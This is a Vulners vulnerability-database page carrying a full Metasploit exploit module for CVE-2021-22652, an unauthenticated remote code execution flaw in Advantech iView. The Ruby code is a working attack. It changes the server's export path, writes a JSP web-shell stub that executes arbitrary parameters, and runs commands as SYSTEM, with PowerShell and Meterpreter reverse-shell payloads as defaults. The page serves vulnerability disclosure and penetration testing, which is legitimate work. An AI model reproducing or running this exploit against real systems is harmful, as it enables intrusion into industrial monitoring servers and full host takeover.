Vulners
Lucene search
Advantech iView Unauthenticated Remote Code Execution
🗓️ 23 Mar 2021 00:00:00Reported by Spencer McIntyreType 
packetstorm🔗 packetstormsecurity.com👁 366 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Advantech iView Unauthenticated Remote Code Execution Exploit | 23 Mar 202100:00 | – | zdt |
 | CVE-2021-22652 | 11 Feb 202100:00 | – | attackerkb |
 | CVE-2021-22652 | 22 Mar 202121:08 | – | circl |
 | Advantech Iview 访问控制错误漏洞 | 9 Feb 202100:00 | – | cnnvd |
 | Advantech iView Critical Functions Lack Authentication Vulnerability | 10 Feb 202100:00 | – | cnvd |
 | Advantech iView Remote Code Execution (CVE-2021-22652) | 11 Apr 202100:00 | – | checkpoint_advisories |
 | CVE-2021-22652 | 11 Feb 202116:06 | – | cve |
 | CVE-2021-22652 | 11 Feb 202116:06 | – | cvelist |
 | Advantech iView | 9 Feb 202100:00 | – | ics |
 | Advantech iView Unauthenticated Remote Code Execution | 23 Mar 202117:42 | – | metasploit |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Advantech iView Unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits an unauthenticated configuration change combined
with an unauthenticated file write primitive, leading to an arbitrary
file write that allows for remote code execution as the user running
iView, which is typically NT AUTHORITY\SYSTEM.
This issue was demonstrated in the vulnerable version 5.7.02.5992 and
fixed in version 5.7.03.6112.
},
'Author' => [
'wvu', # Discovery and exploit
'Spencer McIntyre' # Check, docs, and testing
],
'References' => [
['CVE', '2021-22652'],
['URL', 'https://blog.rapid7.com/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/'],
['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02']
],
'DisclosureDate' => '2021-02-09', # ICS-CERT advisory
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
[
'Windows Command',
{
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
}
],
[
'Windows Dropper',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'
}
}
],
[
'PowerShell Stager',
{
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager,
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
}
}
]
],
'DefaultTarget' => 2,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Application path', '/iView3'])
])
end
def check
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'MenuServlet'),
'vars_post' => {
'page_action_type' => 'getMenuFragment',
'page' => 'version.frag'
}
)
return CheckCode::Unknown unless res&.code == 200
version = res.get_html_document.xpath('string(//input[starts-with(@value, "Version")]/@value)')
return CheckCode::Unknown unless version =~ /Version (\d+\.\d+) \(Build ([\d.]+)\)/
version = "#{Regexp.last_match(1)}.#{Regexp.last_match(2)}"
vprint_status("Identified the version as #{version}")
return CheckCode::Safe if Rex::Version.new(version) >= Rex::Version.new('5.7.03.6112')
CheckCode::Appears
end
def exploit
config = retrieve_config
updated = update_config(config)
write_jsp_stub
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
ensure
restore_config(config) if config && updated
end
def retrieve_config
print_status('Retrieving config')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
'vars_post' => {
'page_action_type' => 'retrieveSystemSettings'
}
)
unless res && res.code == 200 && (config = res.get_json_document.first)
fail_with(Failure::NotFound, 'Failed to retrieve config')
end
print_good('Successfully retrieved config')
vprint_line(JSON.pretty_generate(config))
config
end
def update_config(config)
print_status('Updating config')
config = config.dup
config['EXPORTPATH'] = 'webapps\\iView3\\'
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
'vars_post' => {
'page_action_type' => 'updateSystemSettings',
'json_obj' => config.to_json
}
)
unless res && res.code == 200 && (config = res.get_json_document.first)
fail_with(Failure::NotFound, 'Failed to retrieve updated config')
end
unless config['EXPORTPATH'] == 'webapps\\iView3\\'
fail_with(Failure::NotVulnerable, 'Failed to update config')
end
print_good('Successfully updated config')
vprint_line(JSON.pretty_generate(config))
true
end
def write_jsp_stub
print_status('Writing JSP stub')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
'vars_post' => {
'page_action_type' => 'exportInventoryTable',
'col_list' => "#{jsp_stub}-NULL",
'sortname' => 'NULL',
'sortorder' => '',
'filename' => jsp_filename
}
)
unless res && res.code == 200
fail_with(Failure::NotVulnerable, 'Failed to write JSP stub')
end
register_file_for_cleanup("webapps\\iView3\\#{jsp_filename}")
print_good('Successfully wrote JSP stub')
end
def execute_command(cmd, _opts = {})
cmd.prepend('cmd.exe /c ')
print_status("Executing command: #{cmd}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, jsp_filename),
'vars_post' => {
jsp_param => cmd
}
)
unless res && res.code == 200
fail_with(Failure::PayloadFailed, 'Failed to execute command')
end
print_good('Successfully executed command')
end
def restore_config(config)
print_status('Restoring config')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),
'vars_post' => {
'page_action_type' => 'updateSystemSettings',
'json_obj' => config.to_json
}
)
unless res && res.code == 200 && (config = res.get_json_document.first)
fail_with(Failure::NotFound, 'Failed to retrieve restored config')
end
if config['EXPORTPATH'] == 'webapps\\iView3\\'
fail_with(Failure::UnexpectedReply, 'Failed to restore config')
end
print_good('Successfully restored config')
vprint_line(JSON.pretty_generate(config))
end
def jsp_stub
%(<% Runtime.getRuntime().exec(request.getParameter("#{jsp_param}")); %>)
end
def jsp_param
@jsp_param ||= rand_text_alphanumeric(8..42)
end
def jsp_filename
@jsp_filename ||= "#{rand_text_alphanumeric(8..42)}.jsp"
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2021 00:00Current
1.1Low risk
Vulners AI Score1.1
EPSS0.4086